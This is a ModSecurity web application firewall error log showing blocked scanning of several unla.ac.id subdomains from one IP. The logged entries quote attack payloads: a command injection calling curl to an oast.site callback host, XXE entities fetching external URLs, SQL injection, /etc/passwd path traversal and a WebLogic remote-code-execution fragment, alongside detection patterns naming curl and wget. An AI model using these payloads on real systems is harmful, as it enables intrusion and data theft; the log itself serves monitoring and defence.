[Tue Aug 29 11:31:39.339144 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlgydtnpq66sck5k.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login"] [unique_id "ZO10q8Co-f0AAAQSWM4AAAA0"]
[Tue Aug 29 11:31:39.371405 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgiwx7e8wcsqmze.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQDFUcAAAAl"]
[Tue Aug 29 11:31:39.371455 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlggexhzf5awdnxd.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAN@5H4AAAAO"]
[Tue Aug 29 11:31:39.372935 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlg5bskd7i6ntjze.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQmR4gAAAAH"]
[Tue Aug 29 11:31:39.377276 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10q8Co-f0AAAQSWM8AAAA0"]
[Tue Aug 29 11:31:39.391978 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgxj88fzgrx4bcd.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQFcTYAAAAn"]
[Tue Aug 29 11:31:39.450242 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgqqrgmzq5mj34x.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQA-98AAAAi"]
[Tue Aug 29 11:31:40.363037 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAPah2AAAAAL"]
[Tue Aug 29 11:31:40.388937 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQEGMMAAAAm"]
[Tue Aug 29 11:31:40.391913 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQSWNMAAAA0"]
[Tue Aug 29 11:31:40.392500 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAN@5IIAAAAO"]
[Tue Aug 29 11:31:40.397431 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAQNwHUAAAAv"]
[Tue Aug 29 11:31:40.405006 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlg1yfe9t7oggzeg.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10rMCo-f0AAAP8G0oAAAAV"]
[Tue Aug 29 11:31:41.596990 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQmR48AAAAH"]
[Tue Aug 29 11:31:41.612240 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQSWNQAAAA0"]
[Tue Aug 29 11:31:41.618163 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAPah2MAAAAL"]
[Tue Aug 29 11:31:41.715290 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQJWwEAAAAr"]
[Tue Aug 29 11:31:41.733377 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQFcT0AAAAn"]
[Tue Aug 29 11:31:42.308147 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rsCo-f0AAAPiBkcAAAAB"]
[Tue Aug 29 11:31:42.324513 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10rsCo-f0AAAPxBXMAAAAS"]
[Tue Aug 29 11:31:43.328141 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPiBkkAAAAB"]
[Tue Aug 29 11:31:43.328956 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQMrvEAAAAu"]
[Tue Aug 29 11:31:43.331535 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPah2cAAAAL"]
[Tue Aug 29 11:31:43.336585 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAP5mKAAAAAM"]
[Tue Aug 29 11:31:43.341011 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQV4OwAAAA3"]
[Tue Aug 29 11:31:43.388722 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAPxBXYAAAAS"]
[Tue Aug 29 11:31:44.317158 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "ft.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQnF34AAAAF"]
[Tue Aug 29 11:31:44.317289 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQnF34AAAAF"]
[Tue Aug 29 11:31:44.325326 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAN@5IgAAAAO"]
[Tue Aug 29 11:31:44.328744 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "journal.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAP5mKEAAAAM"]
[Tue Aug 29 11:31:44.328795 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAP5mKEAAAAM"]
[Tue Aug 29 11:31:44.334438 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "pusatbahasa.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAP8G04AAAAV"]
[Tue Aug 29 11:31:44.334477 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAP8G04AAAAV"]
[Tue Aug 29 11:31:44.335321 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQR46sAAAAz"]
[Tue Aug 29 11:31:44.336117 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "informatika.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPMmKMAAAAY"]
[Tue Aug 29 11:31:44.336189 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAPMmKMAAAAY"]
[Tue Aug 29 11:31:44.336487 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQkBXoAAAAC"]
[Tue Aug 29 11:31:44.340538 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAP6NPEAAAAQ"]
[Tue Aug 29 11:31:44.341239 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAQFcUAAAAAn"]
[Tue Aug 29 11:31:44.344476 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQMrvQAAAAu"]
